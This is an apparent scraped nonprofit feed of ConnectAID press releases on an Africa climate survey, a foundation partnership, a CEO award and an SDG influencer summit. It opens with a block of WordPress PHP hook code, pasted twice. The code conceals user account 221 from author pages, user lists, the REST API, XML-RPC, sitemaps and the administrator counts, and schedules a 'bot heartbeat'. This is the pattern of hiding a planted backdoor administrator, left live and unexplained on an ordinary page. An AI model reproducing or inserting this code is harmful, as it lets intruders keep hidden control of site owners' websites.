add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 221;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 221 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 221 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 221;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 221;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 221;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/221(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 221;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 221;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 221 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 221 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 221;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 221;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 221;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/221(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 221;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Empowering Climate Resilience and Sustainable Development
ConnectAID believes that collective efforts and innovative solutions are essential in achieving the Sustainable Development Goals (SDGs). WGIC’s GeoAction Africa project embodies this ethos by harnessing the potential of geospatial innovation to tackle climate change and promote sustainable development in the African continent. By leveraging cutting-edge technology, this project seeks to drive positive change, enhance climate resilience, and foster inclusive growth throughout Africa.
The GeoAction Africa Survey: Your Voice for Climate Action
We invite individuals from diverse backgrounds, including experts, practitioners, policymakers, and local communities in Africa, to participate in the survey. Your insights and perspectives are invaluable in shaping effective strategies and actionable plans that will drive positive change in Africa. This survey addresses a range of thematic areas related to geospatial technology and its applications in climate change mitigation, sustainable agriculture, urban planning, disaster management, public health, and more. By sharing your expertise, experiences, and ideas, you contribute to a comprehensive understanding of the current landscape, identify challenges, and highlight opportunities for collaboration and innovation.
Solidarity in Action: Recognizing WGIC’s Climate Action Prize
ConnectAID proudly supports organizations like WGIC that exemplify solidarity and dedication to creating sustainable solutions. WGIC’s remarkable work and innovative approach were acknowledged through the AGFUND climate action prize. This recognition highlights their significant contributions and inspires others to join the movement towards climate resilience and sustainable development in Africa.
Take the First Step: Make a Difference in Climate Action
Join us in taking the first step towards a climate-resilient and sustainable future for Africa. By participating in the GeoAction Africa Survey, you actively contribute to the creation of innovative and sustainable solutions. Your input shapes the direction of geospatial innovation, fosters collaboration, and empowers communities to effectively address climate challenges.
Click here to participate in the Survey and be a catalyst for positive change in the lives of communities across Africa.
Together, let’s harness the power of geospatial innovation to build climate resilience and shape a sustainable future.
About ConnectAID and WGIC
ConnectAID is a global network dedicated to promoting solidarity, driving SDG action, and connecting organizations and individuals for sustainable development. In collaboration with exceptional nonprofit members like our Member WGIC, we support impactful projects and foster collaborations to address global challenges.
For media inquiries and further information, please contact: Info@connectaid.org

A Meeting of Minds at the World Summit of SDG Influencers: Chandrika Bahadur, the CEO of the Antara Foundation, has been an influential figure in sustainable development and participated as a key speaker at ConnectAID’s World Summit of SDG Influencers. Alongside prominent individuals such as Patrick Paul Walsh, Kent Page, Tom Gloria, Adam Rogers, and Helen Clark, Chandrika shared her expertise and insights, highlighting the critical role of education in achieving Sustainable Development Goals (SDGs).
A Fruitful Encounter in India: During ConnectAID’s field mission to India, Gaelle Mogli met with Chandrika Bahadur and Ashok Alexander, the Founder-Director of the Antara Foundation. Ashok left McKinsey as a Senior Partner to lead the Bill and Melinda Gates Foundation in India. There, he established an HIV prevention program called Avahan which became the world’s largest-ever HIV prevention program. He brings a wealth of experience and knowledge to the foundation’s endeavors.
Exploring Collaboration Opportunities: The meeting provided an opportunity for ConnectAID and The Antara Foundation to explore potential areas of collaboration. ConnectAID’s international solidarity network aims to empower non-profit organizations by raising awareness about their work and facilitating support from individuals and organizations passionate about social impact. By partnering with the Antara Foundation, ConnectAID seeks to amplify the impact of the foundation’s initiatives and contribute to improving the lives of marginalized communities in India.
Amplifying the Antara Foundation’s Impact: Through ConnectAID, the Antara Foundation will gain a broader platform to communicate its mission, programs, and achievements. ConnectAID’s global network of supporters and philanthropic individuals will have the opportunity to learn about the Antara Foundation’s work, engage with its initiatives, and provide support to further its goals.
A Collaborative Vision: ConnectAID and the Antara Foundation share a vision of creating sustainable change and addressing the healthcare needs of vulnerable populations. The partnership is grounded in the belief that collective action and collaboration are key to achieving lasting impact in public health and development.
Looking Ahead: As ConnectAID welcomes the Antara Foundation as a new nonprofit member, both organizations are excited about the possibilities that lie ahead. The collaboration will catalyse positive change, enabling the Antara Foundation to expand its reach, garner support, and make a significant difference in the lives of women and children in India.
The partnership between ConnectAID and the Antara Foundation marks a significant milestone in the pursuit of improved health outcomes for vulnerable populations in India. Through this collaboration, ConnectAID aims to leverage its platform and global network to raise awareness about the Antara Foundation’s work and facilitate support from passionate individuals and organizations around the world. Together, they strive to create a brighter future and foster sustainable development in the realm of public health.
]]>
ConnectAID, established in 2018, was founded by Gaelle Mogli after her extensive experience of over 15 years in the United Nations, including her role as Spokesperson. With a deep understanding of the pressing challenges faced by communities worldwide, Gaelle was inspired to create ConnectAID as a platform to unite and amplify the efforts of nonprofit organizations working towards sustainable development.
This esteemed Global CEO Excellence Award hosted by CEO Monthly recognizes not only Gaelle’s extraordinary achievements but also the invaluable contributions of ConnectAID’s nonprofit and foundation partners. Through collaboration with partners such as WGIC, ISS, FXBIS, AGFUND and many others, ConnectAID has been able to leverage international grants for ConnectAID’s Members, but also expertise, and networks to maximize the impact of their initiatives.
ConnectAID’s vision is to make international solidarity a norm, fostering a sense of collective responsibility and driving increased impact towards achieving the United Nations’ Sustainable Development Goals (SDGs). By connecting nonprofit organization and SDG actors together, ConnectAID strives to create a global community dedicated to making a tangible difference in the lives of vulnerable populations.
Gaelle Mogli expressed her gratitude for the recognition, stating, “I am truly honored to receive the title of Humanitarian Impact CEO of the Year 2023. This award is a testament to the remarkable work of the ConnectAID team and our collaborative partners. Together, we are committed to transforming lives and creating a more sustainable and equitable world.”
ConnectAID continues to expand its network and partnerships, working tirelessly to address critical global challenges and empower communities worldwide. This award reinforces the organization’s dedication to achieving the SDGs and serves as an inspiration to strive for even greater impact in the future.
For media inquiries or further information, please contact: info@connectaid.org
About ConnectAID:
ConnectAID, founded in 2018 by Gaelle Mogli, is a global network of networks that connects organizations, foundations, and volunteers to empower communities and drive sustainable development. By fostering collaboration and providing its members with the tools to communicate, ConnectAID aims to make international solidarity a norm and maximize the impact of initiatives addressing the Sustainable Development Goals (SDGs).
]]>ConnectAID’s World Summit of Social Media Influencers for the Sustainable Development Goals (SDGs) was a groundbreaking event that garnered international reach and engaged millions of viewers. With an audience of over 500 individuals from 187 countries, the summit made a significant impact on social media, reaching over 3 million individuals worldwide.
The conference, organized by ConnectAID, the International Solidarity Network, aimed to leverage the power of social media to inform, inspire, and engage individuals in creating a more equitable and sustainable world. Former UNDP Administrator Helen Clark expressed her enthusiasm for the event, stating, “Great event that ConnectAID organized. I hope people will be inspired by this event to use their voice.”
ConnectAID’s board member, Adam Rogers, highlighted the significance of social media in his book, “Taking Action Online.” In his exploration of online networks and their potential for positive impact, Rogers emphasized the need for collective engagement: “We are indeed each a dot in a constellation of possibilities. On our own, we can discover, refine, and contribute our talents to the greater good. But when we are inspired by others, learn from others, and join forces with others, we become an unstoppable movement.”
As stated by ConnectAID CEO Gaëlle Mogli, “Only together can we tackle the challenges of sustainable development. Now is the time for the online collective to take action and reinvent solidarity – one click at a time.” The COVID-19 crisis highlighted the importance of collective efforts, as many charitable organizations face significant difficulties in fulfilling their missions due to limited resources and donations.
The summit featured an array of influential speakers and panelists who shared their expertise and social media strategies for advancing sustainable development. Ulrika Modeer, ASG & Director of External Relations at UNDP, highlighted the role of communication in post-COVID-19 recovery. Debra Ruh, CEO of Ruh Global IMPACT and Co-Founder and Chair of Billion-Strong, emphasized the importance of collective action: “The world has come together to agree on the UN 17 sustainable development goals (SDGs) to solve our largest global problems. ConnectAID International has brought together NGOs around the world that are on the frontlines supporting the implementation of the UN SDGs. Together we are stronger and can make a huge difference for our living planet, people, and the other inhabitants. I am proud to become an ambassador for this important initiative to save our world.”
Patrick Paul Walsh, Senior Adviser at UN SDSN and Director of Sustainable Development Studies at University College Dublin, highlighted the importance of focusing on the least developed countries: “None of us are doing any good unless we are using our capacities for the least developed countries. I am happy, delighted even, to be an Ambassador for ConnectAID and to be that academic voice.”
Jennifer Williams, co-founder of TakeAction Edu, called for a higher level of solidarity and collective action: “We need to move to the next level of solidarity. ConnectAID offers a human-centered approach with dedication to building an inclusive community and collective action. We are the people, this is the moment—let’s join together for our planet and its citizens.” Kent Page, Chief Advocacy and Communication at Education Cannot Wait, the UN global fund for education in emergencies, praised ConnectAID for their impactful event: “Congratulations to ConnectAID for this great event with so many interactions; what you are building is terrific.”
The summit aimed to inspire and empower participants to use their social media influence to amplify the voices of marginalized communities and drive meaningful change. It served as a platform for social media influencers, activists, and organizations to come together and share their insights, strategies, and success stories in utilizing digital platforms for advancing the SDGs.
Through engaging discussions and interactive sessions, the World Summit of Social Media Influencers for the SDGs provided attendees with valuable knowledge and tools to make a difference. The event showcased innovative approaches to using social media as a force for positive change, highlighting the importance of collaboration, solidarity, and collective action.
ConnectAID’s World Summit of Social Media Influencers for the SDGs was a testament to the power of collaboration and the potential of social media to shape a better future. It demonstrated that by leveraging the reach and influence of online platforms, individuals and organizations can create a global movement that drives sustainable development and social impact. The event not only raised awareness about the SDGs but also fostered meaningful connections and partnerships among participants. It served as a catalyst for collaborative efforts, inspiring attendees to take concrete actions in their respective fields and communities.
With the support and engagement of individuals worldwide, ConnectAID’s World Summit showcased the transformative power of social media and paved the way for a more inclusive and sustainable world. By harnessing the collective strength of social media influencers, the summit made a lasting impact by amplifying marginalized voices, promoting social justice, and advancing the global agenda for sustainable development.
ConnectAID continues its mission to connect individuals, organizations, and communities in the pursuit of sustainable development and social impact. Through ongoing initiatives, collaborations, and advocacy efforts, they strive to create a more equitable and resilient world, where the voices of the most vulnerable are heard, and their needs are met.
The World Summit of SDG Influencers will be remembered as a milestone event that ignited a global movement for positive change. It reinforced the belief that every individual has the power to make a difference and that collective action is essential in achieving the ambitious goals set forth by the United Nations.
As the world progresses towards a more sustainable future, ConnectAID will continue to harness the potential of social media, uniting influencers and change-makers to build a world where no one is left behind. Through their dedication and innovative approach, they inspire hope and create opportunities for a better tomorrow. Together, we can create a brighter and more prosperous future for all.
]]>The International Solidarity Network was founded by Gaëlle Mogli, a former journalist and UN spokesperson, who is determined to innovate for more impact in sustainable development. The current global crisis brought about by the COVID-19 pandemic and Russian war has hit the most vulnerable countries on the planet, and the impact of the crisis has amplified inequalities around the world. According to UN agencies, over two billion people working in the informal sector are particularly affected by the crisis, and more than half a billion people could be pushed into poverty, undoing several decades of progress against extreme poverty. The crisis has also had a significant impact on women, with poverty rates increasing by more than 9%.
The COVID-19 pandemic has highlighted the need for a global yet solidary solution to humanitarian crises. It has forced NGOs to question their financing strategies, including how to finance important needs, how to diversify search for financing, how to adapt to digitalization, and how to sensitize and involve more donors. ConnectAID offers itself as an international solidarity network that connects changemakers to the field, offering a platform to share and help. The platform offers a list of carefully selected NGO Members, whose efficiency on the field has been proven, and who are focused on serving the SDGs. ConnectAID allows NGOs to reduce their costs in communication and focus on their core missions.
ConnectAID’s founder, Gaëlle Mogli, believes that information is critical in the financing of humanitarian projects. The public must be aware of the situation, needs, and sustainable development activities happening in the world. She emphasizes that the lack of precise information is the biggest obstacle to the financing of humanitarian projects. ConnectAID was created to solve these issues and offers everyone the opportunity to commit to sustainable development and bring about positive change.
ConnectAID is a network of networks, with its own social media, that aims to build a strong and lasting bond between NGOs, Foundations, Corporations and people. The platform provides personalized transparency and follow-up on humanitarian projects. It distinguishes itself from other actors in the sector by drawing attention to partnership and collaration. The platform offers everyone the opportunity to stay connected and informed about the progress of the projects they support.
On its social networks, ConnectAID promotes carefully selected non-profit organizations and sustainable development projects. All contribute to one or more SDGs and the global effort for development. The organizations are not competing with one another on ConnectAID. Instead, they understand the importance of solidarity and the power of teamwork. The platform offers a diversified portfolio of projects and organizations to support. ConnectAID aims to help everyone discover “their” cause and become a changemaker.
ConnectAID’s ambition is to develop real change in the world of international solidarity, between organizations and individuals. It aims to create a new normal with more meaning, solidarity, and impact in sustainable development.
In conclusion, ConnectAID is an innovative and ambitious network that aims to accelerate the UN SDGs and enhance communication of humanitarian action. Through ConnectAID, everyone has the opportunity to commit to sustainable development and bring about positive change.
For more information: contact@connectaid.com
